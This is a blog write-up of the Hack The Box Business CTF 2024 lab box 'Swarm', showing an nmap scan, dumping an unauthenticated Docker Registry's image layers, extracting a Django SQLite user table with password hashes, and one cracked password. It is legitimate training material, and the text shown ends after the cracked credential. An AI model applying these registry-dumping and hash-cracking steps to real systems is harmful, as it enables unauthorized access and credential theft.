← Back to blog

Swarm

May 18, 2024 · Hack The Box / Business CTF 2024 boxesdocker-registryhash-cracking

Challenge

  • CTF: HTB Business CTF 2024: The Vault of Hope
  • Name: Swarm
  • Category: Fullpwn
  • Difficulty: Easy
  • Points: 725
  • Description: Embark on a Quest to fight the Swarm as you dive into the digital underbelly of the world’s media by infiltrating the formidable Newsbox agency. In an era where information is power, Newsbox has risen to the forefront, wielding an outsized influence on public opinion and political landscapes across the globe. Amidst the buzzing chaos of breaking news and ever-spinning narratives, your mission is to expose the hidden operations that sway the tides of information.

Writeup

Add site to /etc/hosts: swarm.htb

NMAP:

# Nmap 7.94SVN scan initiated Sat May 18 13:18:19 2024 as: /bin/nmap -n -sC -sV -v -p- --min-rate 3000 --stats-every 3m --max-retries 2 --max-scan-delay 20 --script-args "http.useragent=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" -T4 -oA ./scans/20240518_131819_tcpall swarm.htb
Nmap scan report for swarm.htb (10.129.238.14)
Host is up (0.023s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp   open  http    nginx 1.25.5
|_http-favicon: Unknown favicon MD5: 77C62F50E0A69C4AC72AE72239269561
| http-methods:
|_  Supported Methods: GET HEAD OPTIONS
|_http-server-header: nginx/1.25.5
|_http-title: Home - Simple News Portal
5000/tcp open  http    Docker Registry (API: 2.0)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 18 13:19:06 2024 -- 1 IP address (1 host up) scanned in 47.18 seconds

fullpwn_swarm_1

Docker Registry

python3 drg.py --dump_all -p 5000 http://swarm.htb
[+] newsbox-web
[+] BlobSum found 21
[+] Dumping newsbox-web
    [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
    [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
    [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
    [+] Downloading : 8685cd4e89f2bdf8b926606d02ae5b29e43df7a8b4a3fed7a9fa2bcd5821d994
    [+] Downloading : 6343095ff649d4675193c76a11b90423d3beb3534825220abf36e18502229db6
    [+] Downloading : 4d2c6c1a8e803d94d3555c4487a89be43186bd1b91173eb33407a51fe5ff9e7c
    [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
    [+] Downloading : d361726ad66f2bc2e1928c9b5ddaf7f33b10226d544315ca2408b7d9e2dacd16
    [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
    [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
    [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
    [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
    [+] Downloading : 80ee918b20840648abeedaab21c9dd7a6b03105ec8f362d48d55195e0402ebfb
    [+] Downloading : 545ebfaa75064d83d4862d6b0ca34e531e2e90d431f42a8e59968cc372099695
    [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
    [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
    [+] Downloading : 72914424168c8ebb0dbb3d0e08eb1d3b5b2a64cc51745bd65caf29c335b31dc7
    [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
    [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
    [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
    [+] Downloading : b0a0cf830b12453b7e15359a804215a7bcccd3788e2bcecff2a03af64bbd4df7

cd newsbox-web
for file in ./*; do tar -xvf $file; done

╰─❯ sqlite3 ./db.sqlite3 .dump

INSERT INTO auth_user VALUES(1,'pbkdf2_sha256$60$9jLMaflzyx1C3dAsBqZs8m$1H64ybyNv6NWUIw+TIaYE40VIW9enXe88teW5X+cQEI=','2024-04-30 16:32:56.994788',1,'admin','Administrator','[email protected]',1,1,'2022-04-06 01:44:10','Melo');
INSERT INTO auth_user VALUES(2,'pbkdf2_sha256$60$HXF8aUc1IWkR9ajH3y8LS8$d7MFlG+lVPC03n31bt4u6OvGs7z1hJpiUYp5eGHoAZM=','2022-04-06 08:16:01',0,'ChasingDeadlines','Loman','[email protected]',0,1,'2022-04-06 08:14:40','Chase');
INSERT INTO auth_user VALUES(3,'pbkdf2_sha256$60$6oJcB6Vhj9eECUQS5VgZME$Ha25+TiE5JozOAyUEeN0VTKN27/aNXeWuAp95JXUYFg=',NULL,0,'PenniesForThoughts','Lessing','[email protected]',1,1,'2024-04-25 12:07:58','Penny');

PenniesForThoughts:pbkdf2_sha256$60$6oJcB6Vhj9eECUQS5VgZME$Ha25+TiE5JozOAyUEeN0VTKN27/aNXeWuAp95JXUYFg=:pennypenny99